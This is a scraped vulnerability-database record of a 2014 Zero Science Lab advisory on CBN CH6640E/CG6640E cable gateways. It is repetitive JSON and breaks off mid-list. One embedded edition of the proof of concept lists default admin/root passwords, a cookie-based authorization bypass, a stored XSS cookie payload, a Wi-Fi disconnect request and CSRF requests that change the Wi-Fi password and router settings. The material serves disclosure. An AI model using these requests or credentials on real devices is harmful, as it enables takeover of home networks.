CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
2014-10-25T00:00:00
ID ZSL-2014-5203 Type zeroscience Reporter Gjoko Krstic Modified 2014-10-25T00:00:00
Description
Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014
Summary
The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Description
The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service.
Vendor
Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>
<html><head><title>403 Nothing to see.</title>
<link rel="Shortcut Icon" href="favicon.ico" type="image/x-icon">
<style type="text/css">
<!--
body {
background-color: #000;
}
body,td,th {
font-family: Verdana, Geneva, sans-serif;
}
a:link {
color: #008FEF;
text-decoration: none;
}
a:visited {
color: #008FEF;
text-decoration: none;
}
a:hover {
text-decoration: underline;
color: #666;
}
a:active {
text-decoration: none;
}
-->
</style>
</head>
<body bgcolor=black>
<center>
<font color="#7E88A3" size="2">
<br /><br />
<h1>403 Nothing to see.</h1>
You do not have the powah for this request /403.shtml<br /><br />
<font size="2"><a href="https://www.zeroscience.mk">https://www.zeroscience.mk</a></font>
</font></center>
</body></html>
{"id": "ZSL-2014-5203", "bulletinFamily": "exploit", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> \n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "published": "2014-10-25T00:00:00", "modified": "2014-10-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "reporter": "Gjoko Krstic", "references": [], "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "type": "zeroscience", "lastseen": "2019-11-11T16:11:36", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> \n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-03-23T16:16:59", "references": [{"idList": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "type": "cve"}, {"idList": ["EDB-ID:35075"], "type": "exploitdb"}]}, "score": {"modified": "2019-03-23T16:16:59", "value": 7.4, "vector": "NONE"}}, "hash": "0a295c2c92466c1e12e87d30970d2c5ce7a8a66168dea74222f2a079560790a2", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f66c24acac7472d5f5aeed34d2ef847c", "key": "cvelist"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "d5a9f6a52710c9da60e2db94e75ccaf4", "key": "sourceData"}, {"hash": "8ae079da90a361d7a0abdc807f4cd5a2", "key": "reporter"}, {"hash": "77d58a390a2418f3ec0a57d0cbc9011a", "key": "href"}, {"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2019-03-23T16:16:59", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "REQUEST LIMIT REACHED", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 126}, "differentElements": ["cvss", "sourceData"], "edition": 8, "lastseen": "2019-03-23T16:16:59"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> \n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 3, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "35ad358b3a9a28adfc778382deb52d619339e96eedf5bb2137bd8ccd8f4fffe4", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f66c24acac7472d5f5aeed34d2ef847c", "key": "cvelist"}, {"hash": "0a06c31af4646e1320032051995e03bf", "key": "sourceData"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8ae079da90a361d7a0abdc807f4cd5a2", "key": "reporter"}, {"hash": "77d58a390a2418f3ec0a57d0cbc9011a", "key": "href"}, {"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2018-08-31T00:36:23", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "\u00ef\u00bb\u00bf\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\n\n\nVendor: Compal Broadband Networks (CBN), Inc.\nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway.\n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information.\n\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\nservice.\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info.\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"><script>alert(document.cookie);</script>\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\n\n", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 103}, "differentElements": ["sourceData"], "edition": 3, "lastseen": "2018-08-31T00:36:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> \n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-03-20T16:04:56", "references": [{"idList": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "type": "cve"}, {"idList": ["EDB-ID:35075"], "type": "exploitdb"}]}, "score": {"value": 4.3, "vector": "NONE"}}, "hash": "cb7f6f3adade2dc8c32a9178636c292efb666f3adf0cec9db0e67bc8749343a4", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f66c24acac7472d5f5aeed34d2ef847c", "key": "cvelist"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8ae079da90a361d7a0abdc807f4cd5a2", "key": "reporter"}, {"hash": "c4e10a83b9354d59ad407d546583fbf4", "key": "sourceData"}, {"hash": "77d58a390a2418f3ec0a57d0cbc9011a", "key": "href"}, {"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2019-03-20T16:04:56", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 113}, "differentElements": ["sourceData"], "edition": 5, "lastseen": "2019-03-20T16:04:56"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> 